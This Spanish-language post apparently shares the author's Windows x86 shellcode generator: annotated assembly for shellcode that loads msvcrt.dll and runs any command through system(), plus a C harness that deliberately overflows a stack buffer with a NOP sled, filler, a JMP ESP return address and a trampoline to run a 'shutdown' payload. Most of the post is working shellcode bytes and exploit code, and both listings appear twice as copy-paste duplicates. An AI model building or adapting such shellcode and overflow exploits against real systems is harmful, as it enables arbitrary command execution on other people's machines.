Aquí les dejo un generador de shellcodes hecho por mí. Las shellcodes que genera hacen LoadLibraryA a msvcrt.dll y luego usan system para ejecutar cualquier argumento.
Las shellcodes generadas son de la forma:
Código:
; Shape of the shellcode the generator emits (x86-32, Intel/MASM syntax, Windows).
; Strings are built on the stack from dword immediates so the payload contains no
; 0x00 byte; the 01h placeholder bytes are then zeroed at run time from EDI (=0) to
; NUL-terminate each string.
;
; Caveats a user of this payload should know:
;   * Both call targets are absolute addresses taken from one specific Windows
;     build. With ASLR or a different kernel32.dll/msvcrt.dll the addresses are
;     wrong and the shellcode crashes; resolving them at run time (PEB -> kernel32
;     export table) would remove that dependency.
;   * The HMODULE LoadLibraryA returns in EAX is never checked; on failure (EAX = 0)
;     execution still proceeds to call the hard-coded system address.
;   * system() is cdecl and nothing follows the call: the pushed argument is never
;     popped and there is no ExitProcess/ExitThread, so when the command returns,
;     execution falls through into whatever bytes follow the payload.
mov ebp,esp                             ; EBP = frame base; strings are written just below it
xor edi,edi                             ; EDI = 0, the source of the NUL terminators
sub esp,0Ch                             ; room for "msvcrt.dll" (10 chars + NUL, rounded to 12)
mov dword ptr [ebp-0Ch],6376736Dh       ; "msvc"
mov dword ptr [ebp-08h],642E7472h       ; "rt.d"
mov dword ptr [ebp-04h],01016C6Ch       ; "ll" + two 01h placeholders (keeps the payload 00-free)
mov [ebp-02h],edi                       ; zero the placeholders. NOTE: the generated bytes (66 89 7D FE) encode the 16-bit `mov word ptr [ebp-02h],di`; the 32-bit form written here would also overwrite EBP+0..EBP+1
lea eax,[ebp-0Ch]                       ; EAX = &"msvcrt.dll"
push eax                                ; LoadLibraryA's single argument (stdcall: callee pops it)
mov ebx,7C801D77h                       ; absolute address of kernel32!LoadLibraryA (build-specific)
call ebx                                ; EAX = HMODULE, or 0 on failure (never checked)
sub esp,0Ch                             ; the generator sizes this to the argument length
mov dword ptr [ebp-0Ch],65676572h       ; "rege"
mov dword ptr [ebp-08h],2E746964h       ; "dit."
mov dword ptr [ebp-04h],01657865h       ; "exe" + 01h padding; the generator emits more or fewer 01h bytes depending on whether the length is divisible by 4
mov [ebp-01h],edi                       ; 32-bit store at EBP-1 zeroes EBP-1..EBP+2: three bytes above the frame base are clobbered (in the harness below these are presumably already-executed NOP-sled bytes, but it is a latent bug)
lea eax,[ebp-0Ch]                       ; EAX = &"regedit.exe"; the generator adjusts this offset to the argument length
push eax                                ; system()'s argument (cdecl: the caller should pop it; never done here)
mov ebx,0x77bf93c7                      ; absolute address of msvcrt!system (build-specific)
call ebx                                ; no clean exit after this; falls through into the bytes following the payload
El generador lo que deja elegir son las direcciones (offsets) de LoadLibraryA y de system, y también el argumento de system. Ojo: son direcciones absolutas de kernel32.dll y msvcrt.dll, válidas solo para la versión exacta de Windows de la que se tomaron (sin ASLR); en otra versión la shellcode falla. Además, tras el `call` a system no hay ExitProcess, así que la ejecución sigue en los bytes que haya a continuación.
xor edi,edi
; Duplicate of the first listing (copy/paste artefact of the post): the leading
; `mov ebp,esp` is missing here and `xor edi,edi` got fused onto the preceding
; prose line. Same caveats as the first listing: absolute LoadLibraryA/system
; addresses tied to one Windows build, LoadLibraryA's return value unchecked,
; and no ExitProcess after system().
sub esp,0Ch                             ; room for "msvcrt.dll" + NUL
mov dword ptr [ebp-0Ch],6376736Dh       ; "msvc"
mov dword ptr [ebp-08h],642E7472h       ; "rt.d"
mov dword ptr [ebp-04h],01016C6Ch       ; "ll" + two 01h placeholders
mov [ebp-02h],edi                       ; NUL-terminate; the generated bytes use the 16-bit `di` form (66 89 7D FE)
lea eax,[ebp-0Ch]                       ; EAX = &"msvcrt.dll"
push eax
mov ebx,7C801D77h                       ; LoadLibraryA, absolute address
call ebx                                ; EAX = HMODULE or 0 (unchecked)
sub esp,0Ch                             ; the generator sizes this to the argument length
mov dword ptr [ebp-0Ch],65676572h       ; "rege"
mov dword ptr [ebp-08h],2E746964h       ; "dit."
mov dword ptr [ebp-04h],01657865h       ; "exe" + 01h padding; count depends on whether the length is divisible by 4
mov [ebp-01h],edi                       ; 32-bit store also zeroes EBP+0..EBP+2 (spills past the frame base)
lea eax,[ebp-0Ch]                       ; the generator adjusts this offset to the argument length
push eax
mov ebx,0x77bf93c7                      ; system, absolute address
call ebx                                ; no exit afterwards
Un programa para probar una shellcode hecha con este generador podría ser el siguiente (debe compilarse sin protección de pila —/GS— y ejecutarse con DEP desactivado, en la misma versión de Windows de la que se tomaron las direcciones):
Código:
#include <stdio.h>
#include <string.h>
#include <windows.h>
int main()
{
/*
 * Deliberately vulnerable test harness for a payload produced by the
 * generator above. It assembles the attack string and then overflows the
 * 512-byte stack buffer with strcpy() so that the bytes past the buffer
 * overwrite the saved frame and the return address. It only works on the
 * Windows build the hard-coded addresses come from, compiled without stack
 * cookies (/GS) and run with an executable stack (no DEP).
 */
char buffer[512];
/*
 * Generator output: a 20-byte NOP sled followed by the shellcode. Decoded:
 * LoadLibraryA("msvcrt.dll") through the absolute address 0x7C801D77, then
 * system("shutdown -s -c \"Hola, esto es un ShellCode de NIMOXT\" -t 500")
 * through 0x77BF93C7. Strings are built from dword stores of 01h-padded
 * text and NUL-terminated at run time from EDI=0, so the payload contains
 * no 0x00 byte and survives strcpy/strcat. The last terminator store
 * (89 7D FD = mov [ebp-3],edi) also writes one zero byte at EBP+0, past the
 * string. Nothing follows the system() call: when the command returns,
 * execution falls into the filler bytes below.
 */
char ShellCodeParaEjecutar[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x8B\xEC\x33\xFF\x83\xEC\x0C\xC7\x45\xF4\x6D\x73\x76\x63\xC7\x45\xF8\x72\x74\x2E\x64\xC7\x45\xFC\x6C\x6C\x01\x01\x66\x89\x7D\xFE\x8D\x45\xF4\x50\xBB\x77\x1D\x80\x7C\xFF\xD3\x83\xEC\x40\xC7\x45\xC0\x73\x68\x75\x74\xC7\x45\xC4\x64\x6F\x77\x6E\xC7\x45\xC8\x20\x2D\x73\x20\xC7\x45\xCC\x2D\x63\x20\x22\xC7\x45\xD0\x48\x6F\x6C\x61\xC7\x45\xD4\x2C\x20\x65\x73\xC7\x45\xD8\x74\x6F\x20\x65\xC7\x45\xDC\x73\x20\x75\x6E\xC7\x45\xE0\x61\x20\x53\x68\xC7\x45\xE4\x65\x6C\x6C\x43\xC7\x45\xE8\x6F\x64\x65\x20\xC7\x45\xEC\x64\x65\x20\x4E\xC7\x45\xF0\x49\x4D\x4F\x58\xC7\x45\xF4\x54\x22\x20\x2D\xC7\x45\xF8\x74\x20\x35\x30\xC7\x45\xFC\x30\x01\x01\x01\x89\x7D\xFD\x8D\x45\xC0\x50\xBB\xC7\x93\xBF\x77\xFF\xD3";
/*
 * Filler that carries the overflow up to the return-address slot. The four
 * trailing '?' presumably land in the saved-EBP slot; the exact count needed
 * depends on the compiler's frame layout for this function — confirm it.
 */
char Basura[]="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA????";
/*
 * Overwritten return address: 0x7C951EED, stored little-endian. Per the text
 * below it is the address of a JMP ESP; like the other addresses it is tied
 * to one specific Windows build.
 */
char OffsetParaSaltar[]= "\xED\x1E\x95\x7C";
/*
 * Trampoline reached through the JMP ESP:
 *   8B C4     mov eax,esp
 *   80 EC 02  sub ah,2        ; EAX -= 0x200 (512)
 *   8B E0     mov esp,eax
 *   FF E4     jmp esp         ; back to the start of buffer, into the NOP sled
 */
char ShellCodeParaSaltar[]="\x8B\xC4\x80\xEC\x02\x8B\xE0\xFF\xE4";
/* Assembled attack string; must be large enough for the four pieces plus NUL. */
char StringMalicioso[1024];
strcpy( StringMalicioso,ShellCodeParaEjecutar);
strcat( StringMalicioso, Basura );
strcat( StringMalicioso, OffsetParaSaltar );
strcat( StringMalicioso, ShellCodeParaSaltar );
printf("Empezemos la ShellCode ahora:\n");
/*
 * The intentional overflow: StringMalicioso is longer than buffer. If the
 * frame layout and addresses match, control never reaches the return below.
 */
strcpy (buffer, StringMalicioso);
return 0;
}
OffsetParaSaltar será la dirección de un JMP ESP (aquí 0x7C951EED, escrita en little-endian; como las demás direcciones, depende de la versión de Windows). ShellCodeParaSaltar (`mov eax,esp / sub ah,2 / mov esp,eax / jmp esp`) resta 512 (0x200) a ESP y salta a ESP para ponernos al principio del buffer; el NOP sled inicial de la shellcode absorbe el desajuste de unos pocos bytes.
#include <string.h>
#include <windows.h>
int main()
{
/*
 * Duplicate of the test harness above (copy/paste artefact of the post).
 * As pasted, this copy's include list shows only <string.h> and <windows.h>,
 * so printf() would lack its <stdio.h> prototype here. Same caveats as the
 * first copy: only works on the Windows build the hard-coded addresses come
 * from, without /GS stack cookies and without DEP.
 */
char buffer[512];
/* 20-byte NOP sled + shellcode: LoadLibraryA("msvcrt.dll") via 0x7C801D77,
 * then system("shutdown -s -c \"Hola, esto es un ShellCode de NIMOXT\" -t 500")
 * via 0x77BF93C7. No 0x00 byte inside, so strcpy/strcat copy it whole. */
char ShellCodeParaEjecutar[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x8B\xEC\x33\xFF\x83\xEC\x0C\xC7\x45\xF4\x6D\x73\x76\x63\xC7\x45\xF8\x72\x74\x2E\x64\xC7\x45\xFC\x6C\x6C\x01\x01\x66\x89\x7D\xFE\x8D\x45\xF4\x50\xBB\x77\x1D\x80\x7C\xFF\xD3\x83\xEC\x40\xC7\x45\xC0\x73\x68\x75\x74\xC7\x45\xC4\x64\x6F\x77\x6E\xC7\x45\xC8\x20\x2D\x73\x20\xC7\x45\xCC\x2D\x63\x20\x22\xC7\x45\xD0\x48\x6F\x6C\x61\xC7\x45\xD4\x2C\x20\x65\x73\xC7\x45\xD8\x74\x6F\x20\x65\xC7\x45\xDC\x73\x20\x75\x6E\xC7\x45\xE0\x61\x20\x53\x68\xC7\x45\xE4\x65\x6C\x6C\x43\xC7\x45\xE8\x6F\x64\x65\x20\xC7\x45\xEC\x64\x65\x20\x4E\xC7\x45\xF0\x49\x4D\x4F\x58\xC7\x45\xF4\x54\x22\x20\x2D\xC7\x45\xF8\x74\x20\x35\x30\xC7\x45\xFC\x30\x01\x01\x01\x89\x7D\xFD\x8D\x45\xC0\x50\xBB\xC7\x93\xBF\x77\xFF\xD3";
/* Filler up to the saved-EBP/return-address slots; the four '?' presumably
 * cover saved EBP — depends on the compiled frame layout, confirm. */
char Basura[]="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA????";
/* New return address 0x7C951EED (little-endian): a JMP ESP, build-specific. */
char OffsetParaSaltar[]= "\xED\x1E\x95\x7C";
/* Trampoline: mov eax,esp / sub ah,2 (EAX -= 0x200) / mov esp,eax / jmp esp. */
char ShellCodeParaSaltar[]="\x8B\xC4\x80\xEC\x02\x8B\xE0\xFF\xE4";
char StringMalicioso[1024];
strcpy( StringMalicioso,ShellCodeParaEjecutar);
strcat( StringMalicioso, Basura );
strcat( StringMalicioso, OffsetParaSaltar );
strcat( StringMalicioso, ShellCodeParaSaltar );
printf("Empezemos la ShellCode ahora:\n");
/* The intentional overflow of the 512-byte buffer. */
strcpy (buffer, StringMalicioso);
return 0;
}
















